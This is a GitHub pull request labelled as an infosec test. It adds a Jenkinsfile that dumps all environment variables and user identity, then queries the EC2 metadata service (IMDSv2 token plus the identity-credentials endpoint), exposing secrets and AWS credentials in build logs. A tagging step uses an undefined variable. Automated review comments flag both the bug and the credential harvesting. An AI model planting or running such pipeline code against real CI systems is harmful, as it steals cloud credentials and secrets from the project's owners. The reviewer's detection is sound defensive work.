Skip to content

this is a test from infosec #4

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
jnahuelperez wants to merge 2 commits into
base: master
Choose a base branch
from
Open

this is a test from infosec #4

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
4b46a80
this is a test from infosec
jnahuelperez Dec 4, 2025
1ed2be8
test
jnahuelperez Dec 4, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
48 changes: 48 additions & 0 deletions Jenkinsfile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
pipeline {
agent any

stages {

stage('Environment, User and EC2 Metadata') {
steps {
sshagent(credentials: ['jenkins-github']) {
script {
sh "git tag '${version}'"
sh "git push origin '${version}'"
Copy link

@cursor cursor bot Dec 4, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bug: Undefined version variable used for git tagging

The ${version} variable is referenced in the git tag and git push commands but is never defined anywhere in the pipeline. There's no parameters block, environment block, or script variable assignment for version. This will either create a git tag with an empty/null value or cause the pipeline to fail, potentially corrupting the repository's tag history.

Fix in Cursor Fix in Web

sh '''
echo "=== Environment Variables (set) ==="
set

echo ""
echo "=== User Information ==="
echo "UID: $(id -u)"
echo "Username: $(id -un)"
echo "Full id output:"
id

echo ""
echo "=== EC2 Metadata Token (IMDSv2) ==="
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

if [ -z "$TOKEN" ]; then
echo "No se pudo obtener token. Este nodo probablemente NO es una EC2 o IMDSv2 está deshabilitado."
else
echo "Token obtenido correctamente."
fi

echo ""
echo "=== EC2 Identity Credentials ==="
if [ ! -z "$TOKEN" ]; then
curl -s \
-H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/identity-credentials/ec2/ || \
echo "No se pudo acceder al endpoint identity-credentials."
fi
'''
}
}
}
}
}
}
Copy link

@cursor cursor bot Dec 4, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Bug: Pipeline exposes environment variables and AWS credentials

This Jenkinsfile contains code that harvests sensitive information: the set command dumps all environment variables (potentially exposing secrets, API keys, and credentials), and the script accesses the EC2 metadata service at 169.254.169.254 to retrieve AWS identity credentials. Accessing /latest/meta-data/identity-credentials/ec2/ is a known technique for credential theft from cloud instances. Even if intended as an infosec test, this code exposes sensitive data in build logs and poses serious security risks if merged.

Fix in Cursor Fix in Web